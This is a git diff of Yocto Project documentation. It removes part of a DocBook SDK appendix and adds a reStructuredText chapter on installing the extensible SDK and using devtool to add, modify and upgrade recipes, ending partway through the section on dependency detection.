-                   lsb, lsb-dev, lsb-sdk, minimal, minimal-dev, minimal-initramfs,
-                   sato, sato-dev, sato-sdk, sato-sdk-ptest. For information on
-                   these types of image profiles, see the "<ulink url='&YOCTO_DOCS_REF_URL;#ref-images'>Images</ulink>" chapter in
-                   the Yocto Project Reference Manual.
-
-         <replaceable>arch</replaceable> is a string representing the target architecture:
-                   beaglebone-yocto, beaglebone-yocto-lsb, edgerouter, edgerouter-lsb,
-                   genericx86, genericx86-64, genericx86-64-lsb, genericx86-lsb and qemu*.
-
-<!-->
-         <replaceable>date_time</replaceable> is a date and time stamp.
--->
-
-                </literallayout>
-                The root filesystems provided by the Yocto Project are based
-                off of the <filename>core-image-sato</filename> and
-                <filename>core-image-minimal</filename> images.
-                </para>
-
-                <para>For example, if you plan on using a BeagleBone device
-                as your target hardware and your image is a
-                <filename>core-image-sato-sdk</filename>
-                image, you can download the following file:
-                <literallayout class='monospaced'>
-     core-image-sato-sdk-beaglebone-yocto.tar.bz2
-                </literallayout>
-                </para></listitem>
-            <listitem><para>
-                <emphasis>Initialize the Cross-Development Environment:</emphasis>
-                You must <filename>source</filename> the cross-development
-                environment setup script to establish necessary environment
-                variables.</para>
-
-                <para>This script is located in the top-level directory in
-                which you installed the toolchain (e.g.
-                <filename>poky_sdk</filename>).</para>
-
-                <para>Following is an example based on the toolchain installed
-                in the
-                "<link linkend='sdk-locating-pre-built-sdk-installers'>Locating Pre-Built SDK Installers</link>"
-                section:
-                <literallayout class='monospaced'>
-     $ source ~/poky_sdk/environment-setup-core2-64-poky-linux
-                </literallayout>
-                </para></listitem>
-            <listitem><para>
-                <emphasis>Extract the Root Filesystem:</emphasis>
-                Use the <filename>runqemu-extract-sdk</filename> command
-                and provide the root filesystem image.</para>
-
-                <para>Following is an example command that extracts the root
-                filesystem from a previously built root filesystem image that
-                was downloaded from the
-                <ulink url='&YOCTO_DOCS_OM_URL;#index-downloads'>Index of Releases</ulink>.
-                This command extracts the root filesystem into the
-                <filename>core2-64-sato</filename> directory:
-                <literallayout class='monospaced'>
-     $ runqemu-extract-sdk ~/Downloads/core-image-sato-sdk-beaglebone-yocto.tar.bz2 ~/beaglebone-sato
-                </literallayout>
-                You could now point to the target sysroot at
-                <filename>beablebone-sato</filename>.
-                </para></listitem>
-        </orderedlist>
-    </para>
-</section>
-
-<section id='sdk-installed-standard-sdk-directory-structure'>
-    <title>Installed Standard SDK Directory Structure</title>
-
-    <para>
-        The following figure shows the resulting directory structure after
-        you install the Standard SDK by running the <filename>*.sh</filename>
-        SDK installation script:
-    </para>
-
-    <para>
-        <imagedata fileref="figures/sdk-installed-standard-sdk-directory.png" scale="80" align="center" />
-    </para>
-
-    <para>
-        The installed SDK consists of an environment setup script for the SDK,
-        a configuration file for the target, a version file for the target,
-        and the root filesystem (<filename>sysroots</filename>) needed to
-        develop objects for the target system.
-    </para>
-
-    <para>
-        Within the figure, italicized text is used to indicate replaceable
-        portions of the file or directory name.
-        For example,
-        <replaceable>install_dir</replaceable>/<replaceable>version</replaceable>
-        is the directory where the SDK is installed.
-        By default, this directory is <filename>/opt/poky/</filename>.
-        And, <replaceable>version</replaceable> represents the specific
-        snapshot of the SDK (e.g. <filename>&DISTRO;</filename>).
-        Furthermore, <replaceable>target</replaceable> represents the target
-        architecture (e.g. <filename>i586</filename>) and
-        <replaceable>host</replaceable> represents the development system's
-        architecture (e.g. <filename>x86_64</filename>).
-        Thus, the complete names of the two directories within the
-        <filename>sysroots</filename> could be
-        <filename>i586-poky-linux</filename> and
-        <filename>x86_64-pokysdk-linux</filename> for the target and host,
-        respectively.
-    </para>
-</section>
-
-<section id='sdk-installed-extensible-sdk-directory-structure'>
-    <title>Installed Extensible SDK Directory Structure</title>
-
-    <para>
-        The following figure shows the resulting directory structure after
-        you install the Extensible SDK by running the <filename>*.sh</filename>
-        SDK installation script:
-    </para>
-
-    <para>
-        <imagedata fileref="figures/sdk-installed-extensible-sdk-directory.png" scale="80" align="center" />
-    </para>
-
-    <para>
-        The installed directory structure for the extensible SDK is quite
-        different than the installed structure for the standard SDK.
-        The extensible SDK does not separate host and target parts in the
-        same manner as does the standard SDK.
-        The extensible SDK uses an embedded copy of the OpenEmbedded
-        build system, which has its own sysroots.
-    </para>
-
-    <para>
-        Of note in the directory structure are an environment setup script
-        for the SDK, a configuration file for the target, a version file for
-        the target, and log files for the OpenEmbedded build system
-        preparation script run by the installer and BitBake.
-    </para>
-
-    <para>
-        Within the figure, italicized text is used to indicate replaceable
-        portions of the file or directory name.
-        For example,
-        <replaceable>install_dir</replaceable> is the directory where the SDK
-        is installed, which is <filename>poky_sdk</filename> by default, and
-        <replaceable>target</replaceable> represents the target
-        architecture (e.g. <filename>i586</filename>).
-    </para>
-</section>
-
-</appendix>
-<!--
-vim: expandtab tw=80 ts=4
--->
diff --git a/documentation/sdk-manual/sdk-extensible.rst b/documentation/sdk-manual/sdk-extensible.rst
new file mode 100644
index 0000000000..5ff75ada26
--- /dev/null
+++ b/documentation/sdk-manual/sdk-extensible.rst
@@ -0,0 +1,1356 @@
+.. SPDX-License-Identifier: CC-BY-SA-2.0-UK
+
+************************
+Using the Extensible SDK
+************************
+
+This chapter describes the extensible SDK and how to install it.
+Information covers the pieces of the SDK, how to install it, and
+presents a look at using the ``devtool`` functionality. The extensible
+SDK makes it easy to add new applications and libraries to an image,
+modify the source for an existing component, test changes on the target
+hardware, and ease integration into the rest of the
+:term:`OpenEmbedded Build System`.
+
+.. note::
+
+   For a side-by-side comparison of main features supported for an
+   extensible SDK as compared to a standard SDK, see the "
+   Introduction
+   " section.
+
+In addition to the functionality available through ``devtool``, you can
+alternatively make use of the toolchain directly, for example from
+Makefile and Autotools. See the "`Using the SDK Toolchain
+Directly <#sdk-working-projects>`__" chapter for more information.
+
+.. _sdk-extensible-sdk-intro:
+
+Why use the Extensible SDK and What is in It?
+=============================================
+
+The extensible SDK provides a cross-development toolchain and libraries
+tailored to the contents of a specific image. You would use the
+Extensible SDK if you want a toolchain experience supplemented with the
+powerful set of ``devtool`` commands tailored for the Yocto Project
+environment.
+
+The installed extensible SDK consists of several files and directories.
+Basically, it contains an SDK environment setup script, some
+configuration files, an internal build system, and the ``devtool``
+functionality.
+
+.. _sdk-installing-the-extensible-sdk:
+
+Installing the Extensible SDK
+=============================
+
+The first thing you need to do is install the SDK on your :term:`Build
+Host` by running the ``*.sh`` installation script.
+
+You can download a tarball installer, which includes the pre-built
+toolchain, the ``runqemu`` script, the internal build system,
+``devtool``, and support files from the appropriate
+:yocto_dl:`toolchain </releases/yocto/yocto-3.1.2/toolchain/>` directory within the Index of
+Releases. Toolchains are available for several 32-bit and 64-bit
+architectures with the ``x86_64`` directories, respectively. The
+toolchains the Yocto Project provides are based off the
+``core-image-sato`` and ``core-image-minimal`` images and contain
+libraries appropriate for developing against that image.
+
+The names of the tarball installer scripts are such that a string
+representing the host system appears first in the filename and then is
+immediately followed by a string representing the target architecture.
+An extensible SDK has the string "-ext" as part of the name. Following
+is the general form:
+::
+
+   poky-glibc-host_system-image_type-arch-toolchain-ext-release_version.sh
+
+   Where:
+       host_system is a string representing your development system:
+
+                  i686 or x86_64.
+
+       image_type is the image for which the SDK was built:
+
+                  core-image-sato or core-image-minimal
+
+       arch is a string representing the tuned target architecture:
+
+                  aarch64, armv5e, core2-64, i586, mips32r2, mips64, ppc7400, or cortexa8hf-neon
+
+       release_version is a string representing the release number of the Yocto Project:
+
+                  3.1.2, 3.1.2+snapshot
+
+For example, the following SDK installer is for a 64-bit
+development host system and a i586-tuned target architecture based off
+the SDK for ``core-image-sato`` and using the current DISTRO snapshot:
+::
+
+   poky-glibc-x86_64-core-image-sato-i586-toolchain-ext-DISTRO.sh
+
+.. note::
+
+   As an alternative to downloading an SDK, you can build the SDK
+   installer. For information on building the installer, see the "
+   Building an SDK Installer
+   " section.
+
+The SDK and toolchains are self-contained and by default are installed
+into the ``poky_sdk`` folder in your home directory. You can choose to
+install the extensible SDK in any location when you run the installer.
+However, because files need to be written under that directory during
+the normal course of operation, the location you choose for installation
+must be writable for whichever users need to use the SDK.
+
+The following command shows how to run the installer given a toolchain
+tarball for a 64-bit x86 development host system and a 64-bit x86 target
+architecture. The example assumes the SDK installer is located in
+``~/Downloads/`` and has execution rights.
+
+.. note::
+
+   If you do not have write permissions for the directory into which you
+   are installing the SDK, the installer notifies you and exits. For
+   that case, set up the proper permissions in the directory and run the
+   installer again.
+
+::
+
+   $ ./Downloads/poky-glibc-x86_64-core-image-minimal-core2-64-toolchain-ext-2.5.sh
+   Poky (Yocto Project Reference Distro) Extensible SDK installer version 2.5
+   ==========================================================================
+   Enter target directory for SDK (default: ~/poky_sdk):
+   You are about to install the SDK to "/home/scottrif/poky_sdk". Proceed [Y/n]? Y
+   Extracting SDK..............done
+   Setting it up...
+   Extracting buildtools...
+   Preparing build system...
+   Parsing recipes: 100% |##################################################################| Time: 0:00:52
+   Initialising tasks: 100% |###############################################################| Time: 0:00:00
+   Checking sstate mirror object availability: 100% |#######################################| Time: 0:00:00
+   Loading cache: 100% |####################################################################| Time: 0:00:00
+   Initialising tasks: 100% |###############################################################| Time: 0:00:00
+   done
+   SDK has been successfully set up and is ready to be used.
+   Each time you wish to use the SDK in a new shell session, you need to source the environment setup script e.g.
+    $ . /home/scottrif/poky_sdk/environment-setup-core2-64-poky-linux
+
+.. _sdk-running-the-extensible-sdk-environment-setup-script:
+
+Running the Extensible SDK Environment Setup Script
+===================================================
+
+Once you have the SDK installed, you must run the SDK environment setup
+script before you can actually use the SDK. This setup script resides in
+the directory you chose when you installed the SDK, which is either the
+default ``poky_sdk`` directory or the directory you chose during
+installation.
+
+Before running the script, be sure it is the one that matches the
+architecture for which you are developing. Environment setup scripts
+begin with the string "``environment-setup``" and include as part of
+their name the tuned target architecture. As an example, the following
+commands set the working directory to where the SDK was installed and
+then source the environment setup script. In this example, the setup
+script is for an IA-based target machine using i586 tuning:
+::
+
+   $ cd /home/scottrif/poky_sdk
+   $ source environment-setup-core2-64-poky-linux
+   SDK environment now set up; additionally you may now run devtool to perform development tasks.
+   Run devtool --help for further details.
+
+Running the setup script defines many environment variables needed in
+order to use the SDK (e.g. ``PATH``,
+:term:`CC`,
+:term:`LD`, and so forth). If you want to
+see all the environment variables the script exports, examine the
+installation file itself.
+
+Using ``devtool`` in Your SDK Workflow
+======================================
+
+The cornerstone of the extensible SDK is a command-line tool called
+``devtool``. This tool provides a number of features that help you
+build, test and package software within the extensible SDK, and
+optionally integrate it into an image built by the OpenEmbedded build
+system.
+
+.. note::
+
+   The use of
+   devtool
+   is not limited to the extensible SDK. You can use
+   devtool
+   to help you easily develop any project whose build output must be
+   part of an image built using the build system.
+
+The ``devtool`` command line is organized similarly to
+:ref:`overview-manual/overview-manual-development-environment:git` in that it has a number of
+sub-commands for each function. You can run ``devtool --help`` to see
+all the commands.
+
+.. note::
+
+   See the "
+   devtool
+    Quick Reference
+   " in the Yocto Project Reference Manual for a
+   devtool
+   quick reference.
+
+Three ``devtool`` subcommands exist that provide entry-points into
+development:
+
+-  *devtool add*: Assists in adding new software to be built.
+
+-  *devtool modify*: Sets up an environment to enable you to modify
+   the source of an existing component.
+
+-  *devtool upgrade*: Updates an existing recipe so that you can
+   build it for an updated set of source files.
+
+As with the build system, "recipes" represent software packages within
+``devtool``. When you use ``devtool add``, a recipe is automatically
+created. When you use ``devtool modify``, the specified existing recipe
+is used in order to determine where to get the source code and how to
+patch it. In both cases, an environment is set up so that when you build
+the recipe a source tree that is under your control is used in order to
+allow you to make changes to the source as desired. By default, new
+recipes and the source go into a "workspace" directory under the SDK.
+
+The remainder of this section presents the ``devtool add``,
+``devtool modify``, and ``devtool upgrade`` workflows.
+
+.. _sdk-use-devtool-to-add-an-application:
+
+Use ``devtool add`` to Add an Application
+-----------------------------------------
+
+The ``devtool add`` command generates a new recipe based on existing
+source code. This command takes advantage of the
+:ref:`devtool-the-workspace-layer-structure`
+layer that many ``devtool`` commands use. The command is flexible enough
+to allow you to extract source code into both the workspace or a
+separate local Git repository and to use existing code that does not
+need to be extracted.
+
+Depending on your particular scenario, the arguments and options you use
+with ``devtool add`` form different combinations. The following diagram
+shows common development flows you would use with the ``devtool add``
+command:
+
+.. image:: figures/sdk-devtool-add-flow.png
+   :align: center
+
+1. *Generating the New Recipe*: The top part of the flow shows three
+   scenarios by which you could use ``devtool add`` to generate a recipe
+   based on existing source code.
+
+   In a shared development environment, it is typical for other
+   developers to be responsible for various areas of source code. As a
+   developer, you are probably interested in using that source code as
+   part of your development within the Yocto Project. All you need is
+   access to the code, a recipe, and a controlled area in which to do
+   your work.
+
+   Within the diagram, three possible scenarios feed into the
+   ``devtool add`` workflow:
+
+   -  *Left*: The left scenario in the figure represents a common
+      situation where the source code does not exist locally and needs
+      to be extracted. In this situation, the source code is extracted
+      to the default workspace - you do not want the files in some
+      specific location outside of the workspace. Thus, everything you
+      need will be located in the workspace:
+      ::
+
+         $ devtool add recipe fetchuri
+
+      With this command, ``devtool`` extracts the upstream
+      source files into a local Git repository within the ``sources``
+      folder. The command then creates a recipe named recipe and a
+      corresponding append file in the workspace. If you do not provide
+      recipe, the command makes an attempt to determine the recipe name.
+
+   -  *Middle*: The middle scenario in the figure also represents a
+      situation where the source code does not exist locally. In this
+      case, the code is again upstream and needs to be extracted to some
+      local area - this time outside of the default workspace.
+
+      .. note::
+
+         If required,
+         devtool
+         always creates a Git repository locally during the extraction.
+
+      Furthermore, the first positional argument srctree in this case
+      identifies where the ``devtool add`` command will locate the
+      extracted code outside of the workspace. You need to specify an
+      empty directory:
+      ::
+
+         $ devtool add recipe srctree fetchuri
+
+      In summary,
+      the source code is pulled from fetchuri and extracted into the
+      location defined by srctree as a local Git repository.
+
+      Within workspace, ``devtool`` creates a recipe named recipe along
+      with an associated append file.
+
+   -  *Right*: The right scenario in the figure represents a situation
+      where the srctree has been previously prepared outside of the
+      ``devtool`` workspace.
+
+      The following command provides a new recipe name and identifies
+      the existing source tree location:
+      ::
+
+         $ devtool add recipe srctree
+
+      The command examines the source code and creates a recipe named
+      recipe for the code and places the recipe into the workspace.
+
+      Because the extracted source code already exists, ``devtool`` does
+      not try to relocate the source code into the workspace - only the
+      new recipe is placed in the workspace.
+
+      Aside from a recipe folder, the command also creates an associated
+      append folder and places an initial ``*.bbappend`` file within.
+
+2. *Edit the Recipe*: You can use ``devtool edit-recipe`` to open up the
+   editor as defined by the ``$EDITOR`` environment variable and modify
+   the file:
+   ::
+
+      $ devtool edit-recipe recipe
+
+   From within the editor, you
+   can make modifications to the recipe that take affect when you build
+   it later.
+
+3. *Build the Recipe or Rebuild the Image*: The next step you take
+   depends on what you are going to do with the new code.
+
+   If you need to eventually move the build output to the target
+   hardware, use the following ``devtool`` command:
+   :;
+
+      $ devtool build recipe
+
+   On the other hand, if you want an image to contain the recipe's
+   packages from the workspace for immediate deployment onto a device
+   (e.g. for testing purposes), you can use the ``devtool build-image``
+   command:
+   ::
+
+      $ devtool build-image image
+
+4. *Deploy the Build Output*: When you use the ``devtool build`` command
+   to build out your recipe, you probably want to see if the resulting
+   build output works as expected on the target hardware.
+
+   .. note::
+
+      This step assumes you have a previously built image that is
+      already either running in QEMU or is running on actual hardware.
+      Also, it is assumed that for deployment of the image to the
+      target, SSH is installed in the image and, if the image is running
+      on real hardware, you have network access to and from your
+      development machine.
+
+   You can deploy your build output to that target hardware by using the
+   ``devtool deploy-target`` command: $ devtool deploy-target recipe
+   target The target is a live target machine running as an SSH server.
+
+   You can, of course, also deploy the image you build to actual
+   hardware by using the ``devtool build-image`` command. However,
+   ``devtool`` does not provide a specific command that allows you to
+   deploy the image to actual hardware.
+
+5. *Finish Your Work With the Recipe*: The ``devtool finish`` command
+   creates any patches corresponding to commits in the local Git
+   repository, moves the new recipe to a more permanent layer, and then
+   resets the recipe so that the recipe is built normally rather than
+   from the workspace.
+   ::
+
+      $ devtool finish recipe layer
+
+   .. note::
+
+      Any changes you want to turn into patches must be committed to the
+      Git repository in the source tree.
+
+   As mentioned, the ``devtool finish`` command moves the final recipe
+   to its permanent layer.
+
+   As a final process of the ``devtool finish`` command, the state of
+   the standard layers and the upstream source is restored so that you
+   can build the recipe from those areas rather than the workspace.
+
+   .. note::
+
+      You can use the
+      devtool reset
+      command to put things back should you decide you do not want to
+      proceed with your work. If you do use this command, realize that
+      the source tree is preserved.
+
+.. _sdk-devtool-use-devtool-modify-to-modify-the-source-of-an-existing-component:
+
+Use ``devtool modify`` to Modify the Source of an Existing Component
+--------------------------------------------------------------------
+
+The ``devtool modify`` command prepares the way to work on existing code
+that already has a local recipe in place that is used to build the
+software. The command is flexible enough to allow you to extract code
+from an upstream source, specify the existing recipe, and keep track of
+and gather any patch files from other developers that are associated
+with the code.
+
+Depending on your particular scenario, the arguments and options you use
+with ``devtool modify`` form different combinations. The following
+diagram shows common development flows for the ``devtool modify``
+command:
+
+.. image:: figures/sdk-devtool-modify-flow.png
+   :align: center
+
+1. *Preparing to Modify the Code*: The top part of the flow shows three
+   scenarios by which you could use ``devtool modify`` to prepare to
+   work on source files. Each scenario assumes the following:
+
+   -  The recipe exists locally in a layer external to the ``devtool``
+      workspace.
+
+   -  The source files exist either upstream in an un-extracted state or
+      locally in a previously extracted state.
+
+   The typical situation is where another developer has created a layer
+   for use with the Yocto Project and their recipe already resides in
+   that layer. Furthermore, their source code is readily available
+   either upstream or locally.
+
+   -  *Left*: The left scenario in the figure represents a common
+      situation where the source code does not exist locally and it
+      needs to be extracted from an upstream source. In this situation,
+      the source is extracted into the default ``devtool`` workspace
+      location. The recipe, in this scenario, is in its own layer
+      outside the workspace (i.e. ``meta-``\ layername).
+
+      The following command identifies the recipe and, by default,
+      extracts the source files:
+      ::
+
+         $ devtool modify recipe
+
+      Once
+      ``devtool``\ locates the recipe, ``devtool`` uses the recipe's
+      :term:`SRC_URI` statements to
+      locate the source code and any local patch files from other
+      developers.
+
+      With this scenario, no srctree argument exists. Consequently, the
+      default behavior of the ``devtool modify`` command is to extract
+      the source files pointed to by the ``SRC_URI`` statements into a
+      local Git structure. Furthermore, the location for the extracted
+      source is the default area within the ``devtool`` workspace. The
+      result is that the command sets up both the source code and an
+      append file within the workspace while the recipe remains in its
+      original location.
+
+      Additionally, if you have any non-patch local files (i.e. files
+      referred to with ``file://`` entries in ``SRC_URI`` statement
+      excluding ``*.patch/`` or ``*.diff``), these files are copied to
+      an ``oe-local-files`` folder under the newly created source tree.
+      Copying the files here gives you a convenient area from which you
+      can modify the files. Any changes or additions you make to those
+      files are incorporated into the build the next time you build the
+      software just as are other changes you might have made to the
+      source.
+
+   -  *Middle*: The middle scenario in the figure represents a situation
+      where the source code also does not exist locally. In this case,
+      the code is again upstream and needs to be extracted to some local
+      area as a Git repository. The recipe, in this scenario, is again
+      local and in its own layer outside the workspace.
+
+      The following command tells ``devtool`` the recipe with which to
+      work and, in this case, identifies a local area for the extracted
+      source files that exists outside of the default ``devtool``
+      workspace:
+      ::
+
+         $ devtool modify recipe srctree
+
+      .. note::
+
+         You cannot provide a URL for
+         srctree
+         using the
+         devtool
+         command.
+
+      As with all extractions, the command uses the recipe's ``SRC_URI``
+      statements to locate the source files and any associated patch
+      files. Non-patch files are copied to an ``oe-local-files`` folder
+      under the newly created source tree.
+
+      Once the files are located, the command by default extracts them
+      into srctree.
+
+      Within workspace, ``devtool`` creates an append file for the
+      recipe. The recipe remains in its original location but the source
+      files are extracted to the location you provide with srctree.
+
+   -  *Right*: The right scenario in the figure represents a situation
+      where the source tree (srctree) already exists locally as a
+      previously extracted Git structure outside of the ``devtool``
+      workspace. In this example, the recipe also exists elsewhere
+      locally in its own layer.
+
+      The following command tells ``devtool`` the recipe with which to
+      work, uses the "-n" option to indicate source does not need to be
+      extracted, and uses srctree to point to the previously extracted
+      source files:
+      ::
+
+         $ devtool modify -n recipe srctree
+
+      If an ``oe-local-files`` subdirectory happens to exist and it
+      contains non-patch files, the files are used. However, if the
+      subdirectory does not exist and you run the ``devtool finish``
+      command, any non-patch files that might exist next to the recipe
+      are removed because it appears to ``devtool`` that you have
+      deleted those files.
+
+      Once the ``devtool modify`` command finishes, it creates only an
+      append file for the recipe in the ``devtool`` workspace. The
+      recipe and the source code remain in their original locations.
+
+2. *Edit the Source*: Once you have used the ``devtool modify`` command,
+   you are free to make changes to the source files. You can use any
+   editor you like to make and save your source code modifications.
+
+3. *Build the Recipe or Rebuild the Image*: The next step you take
+   depends on what you are going to do with the new code.
+
+   If you need to eventually move the build output to the target
+   hardware, use the following ``devtool`` command:
+   ::
+
+      $ devtool build recipe
+
+   On the other hand, if you want an image to contain the recipe's
+   packages from the workspace for immediate deployment onto a device
+   (e.g. for testing purposes), you can use the ``devtool build-image``
+   command: $ devtool build-image image
+
+4. *Deploy the Build Output*: When you use the ``devtool build`` command
+   to build out your recipe, you probably want to see if the resulting
+   build output works as expected on target hardware.
+
+   .. note::
+
+      This step assumes you have a previously built image that is
+      already either running in QEMU or running on actual hardware.
+      Also, it is assumed that for deployment of the image to the
+      target, SSH is installed in the image and if the image is running
+      on real hardware that you have network access to and from your
+      development machine.
+
+   You can deploy your build output to that target hardware by using the
+   ``devtool deploy-target`` command:
+   ::
+
+      $ devtool deploy-target recipe target
+
+   The target is a live target machine running as an SSH server.
+
+   You can, of course, use other methods to deploy the image you built
+   using the ``devtool build-image`` command to actual hardware.
+   ``devtool`` does not provide a specific command to deploy the image
+   to actual hardware.
+
+5. *Finish Your Work With the Recipe*: The ``devtool finish`` command
+   creates any patches corresponding to commits in the local Git
+   repository, updates the recipe to point to them (or creates a
+   ``.bbappend`` file to do so, depending on the specified destination
+   layer), and then resets the recipe so that the recipe is built
+   normally rather than from the workspace.
+   ::
+
+      $ devtool finish recipe layer
+
+   .. note::
+
+      Any changes you want to turn into patches must be staged and
+      committed within the local Git repository before you use the
+      devtool finish
+      command.
+
+   Because there is no need to move the recipe, ``devtool finish``
+   either updates the original recipe in the original layer or the
+   command creates a ``.bbappend`` file in a different layer as provided
+   by layer. Any work you did in the ``oe-local-files`` directory is
+   preserved in the original files next to the recipe during the
+   ``devtool finish`` command.
+
+   As a final process of the ``devtool finish`` command, the state of
+   the standard layers and the upstream source is restored so that you
+   can build the recipe from those areas rather than from the workspace.
+
+   .. note::
+
+      You can use the
+      devtool reset
+      command to put things back should you decide you do not want to
+      proceed with your work. If you do use this command, realize that
+      the source tree is preserved.
+
+.. _sdk-devtool-use-devtool-upgrade-to-create-a-version-of-the-recipe-that-supports-a-newer-version-of-the-software:
+
+Use ``devtool upgrade`` to Create a Version of the Recipe that Supports a Newer Version of the Software
+-------------------------------------------------------------------------------------------------------
+
+The ``devtool upgrade`` command upgrades an existing recipe to that of a
+more up-to-date version found upstream. Throughout the life of software,
+recipes continually undergo version upgrades by their upstream
+publishers. You can use the ``devtool upgrade`` workflow to make sure
+your recipes you are using for builds are up-to-date with their upstream
+counterparts.
+
+.. note::
+
+   Several methods exist by which you can upgrade recipes -
+   devtool upgrade
+   happens to be one. You can read about all the methods by which you
+   can upgrade recipes in the "
+   Upgrading Recipes
+   " section of the Yocto Project Development Tasks Manual.
+
+The ``devtool upgrade`` command is flexible enough to allow you to
+specify source code revision and versioning schemes, extract code into
+or out of the ``devtool``
+:ref:`devtool-the-workspace-layer-structure`,
+and work with any source file forms that the
+:ref:`fetchers <bitbake:bb-fetchers>` support.
+
+The following diagram shows the common development flow used with the
+``devtool upgrade`` command:
+
+.. image:: figures/sdk-devtool-upgrade-flow.png
+   :align: center
+
+1. *Initiate the Upgrade*: The top part of the flow shows the typical
+   scenario by which you use the ``devtool upgrade`` command. The
+   following conditions exist:
+
+   -  The recipe exists in a local layer external to the ``devtool``
+      workspace.
+
+   -  The source files for the new release exist in the same location
+      pointed to by :term:`SRC_URI`
+      in the recipe (e.g. a tarball with the new version number in the
+      name, or as a different revision in the upstream Git repository).
+
+   A common situation is where third-party software has undergone a
+   revision so that it has been upgraded. The recipe you have access to
+   is likely in your own layer. Thus, you need to upgrade the recipe to
+   use the newer version of the software:
+   ::
+
+      $ devtool upgrade -V version recipe
+
+   By default, the ``devtool upgrade`` command extracts source
+   code into the ``sources`` directory in the
+   :ref:`devtool-the-workspace-layer-structure`.
+   If you want the code extracted to any other location, you need to
+   provide the srctree positional argument with the command as follows:
+   $ devtool upgrade -V version recipe srctree
+
+   .. note::
+
+      In this example, the "-V" option specifies the new version. If you
+      don't use "-V", the command upgrades the recipe to the latest
+      version.
+
+   If the source files pointed to by the ``SRC_URI`` statement in the
+   recipe are in a Git repository, you must provide the "-S" option and
+   specify a revision for the software.
+
+   Once ``devtool`` locates the recipe, it uses the ``SRC_URI`` variable
+   to locate the source code and any local patch files from other
+   developers. The result is that the command sets up the source code,
+   the new version of the recipe, and an append file all within the
+   workspace.
+
+   Additionally, if you have any non-patch local files (i.e. files
+   referred to with ``file://`` entries in ``SRC_URI`` statement
+   excluding ``*.patch/`` or ``*.diff``), these files are copied to an
+   ``oe-local-files`` folder under the newly created source tree.
+   Copying the files here gives you a convenient area from which you can
+   modify the files. Any changes or additions you make to those files
+   are incorporated into the build the next time you build the software
+   just as are other changes you might have made to the source.
+
+2. *Resolve any Conflicts created by the Upgrade*: Conflicts could exist
+   due to the software being upgraded to a new version. Conflicts occur
+   if your recipe specifies some patch files in ``SRC_URI`` that
+   conflict with changes made in the new version of the software. For
+   such cases, you need to resolve the conflicts by editing the source
+   and following the normal ``git rebase`` conflict resolution process.
+
+   Before moving onto the next step, be sure to resolve any such
+   conflicts created through use of a newer or different version of the
+   software.
+
+3. *Build the Recipe or Rebuild the Image*: The next step you take
+   depends on what you are going to do with the new code.
+
+   If you need to eventually move the build output to the target
+   hardware, use the following ``devtool`` command:
+   ::
+
+      $ devtool build recipe
+
+   On the other hand, if you want an image to contain the recipe's
+   packages from the workspace for immediate deployment onto a device
+   (e.g. for testing purposes), you can use the ``devtool build-image``
+   command:
+   ::
+
+      $ devtool build-image image
+
+4. *Deploy the Build Output*: When you use the ``devtool build`` command
+   or ``bitbake`` to build your recipe, you probably want to see if the
+   resulting build output works as expected on target hardware.
+
+   .. note::
+
+      This step assumes you have a previously built image that is
+      already either running in QEMU or running on actual hardware.
+      Also, it is assumed that for deployment of the image to the
+      target, SSH is installed in the image and if the image is running
+      on real hardware that you have network access to and from your
+      development machine.
+
+   You can deploy your build output to that target hardware by using the
+   ``devtool deploy-target`` command: $ devtool deploy-target recipe
+   target The target is a live target machine running as an SSH server.
+
+   You can, of course, also deploy the image you build using the
+   ``devtool build-image`` command to actual hardware. However,
+   ``devtool`` does not provide a specific command that allows you to do
+   this.
+
+5. *Finish Your Work With the Recipe*: The ``devtool finish`` command
+   creates any patches corresponding to commits in the local Git
+   repository, moves the new recipe to a more permanent layer, and then
+   resets the recipe so that the recipe is built normally rather than
+   from the workspace.
+
+   Any work you did in the ``oe-local-files`` directory is preserved in
+   the original files next to the recipe during the ``devtool finish``
+   command.
+
+   If you specify a destination layer that is the same as the original
+   source, then the old version of the recipe and associated files are
+   removed prior to adding the new version.
+   ::
+
+      $ devtool finish recipe layer
+
+   .. note::
+
+      Any changes you want to turn into patches must be committed to the
+      Git repository in the source tree.
+
+   As a final process of the ``devtool finish`` command, the state of
+   the standard layers and the upstream source is restored so that you
+   can build the recipe from those areas rather than the workspace.
+
+   .. note::
+
+      You can use the
+      devtool reset
+      command to put things back should you decide you do not want to
+      proceed with your work. If you do use this command, realize that
+      the source tree is preserved.
+
+.. _sdk-a-closer-look-at-devtool-add:
+
+A Closer Look at ``devtool add``
+================================
+
+The ``devtool add`` command automatically creates a recipe based on the
+source tree you provide with the command. Currently, the command has
+support for the following:
+
+-  Autotools (``autoconf`` and ``automake``)
+
+-  CMake
+
+-  Scons
+
+-  ``qmake``
+
+-  Plain ``Makefile``
+
+-  Out-of-tree kernel module
+
+-  Binary package (i.e. "-b" option)
+
+-  Node.js module
+
+-  Python modules that use ``setuptools`` or ``distutils``
+
+Apart from binary packages, the determination of how a source tree
+should be treated is automatic based on the files present within that
+source tree. For example, if a ``CMakeLists.txt`` file is found, then
+the source tree is assumed to be using CMake and is treated accordingly.
+
+.. note::
+
+   In most cases, you need to edit the automatically generated recipe in
+   order to make it build properly. Typically, you would go through
+   several edit and build cycles until the recipe successfully builds.
+   Once the recipe builds, you could use possible further iterations to
+   test the recipe on the target device.
+
+The remainder of this section covers specifics regarding how parts of
+the recipe are generated.
+
+.. _sdk-name-and-version:
+
+Name and Version
+----------------
+
+If you do not specify a name and version on the command line,
+``devtool add`` uses various metadata within the source tree in an
+attempt to determine the name and version of the software being built.
+Based on what the tool determines, ``devtool`` sets the name of the
+created recipe file accordingly.
+
+If ``devtool`` cannot determine the name and version, the command prints
+an error. For such cases, you must re-run the command and provide the
+name and version, just the name, or just the version as part of the
+command line.
+
+Sometimes the name or version determined from the source tree might be
+incorrect. For such a case, you must reset the recipe:
+::
+
+   $ devtool reset -n recipename
+
+After running the ``devtool reset`` command, you need to
+run ``devtool add`` again and provide the name or the version.
+
+.. _sdk-dependency-detection-and-mapping:
+
+Dependency Detection and Mapping
+--------------------------------
+
+The ``devtool add`` command attempts to detect build-time dependencies
+and map them to other recipes in the system. During this mapping, the
+command fills in the names of those recipes as part of the
+:term:`DEPENDS` variable within the
+recipe. If a dependency cannot be mapped, ``devtool`` places a comment
+in the recipe indicating such. The inability to map a dependency can
+result from naming not being recognized or because the dependency simply
+is not available. For cases where the dependency is not available, you
+must use the ``devtool add`` command to add an additional recipe that
+satisfies the dependency. Once you add that recipe, you need to update
+the ``DEPENDS`` variable in the original recipe to include the new
+recipe.
+
+If you need to add runtime dependencies, you can do so by adding the
+following to your recipe:
+::
+
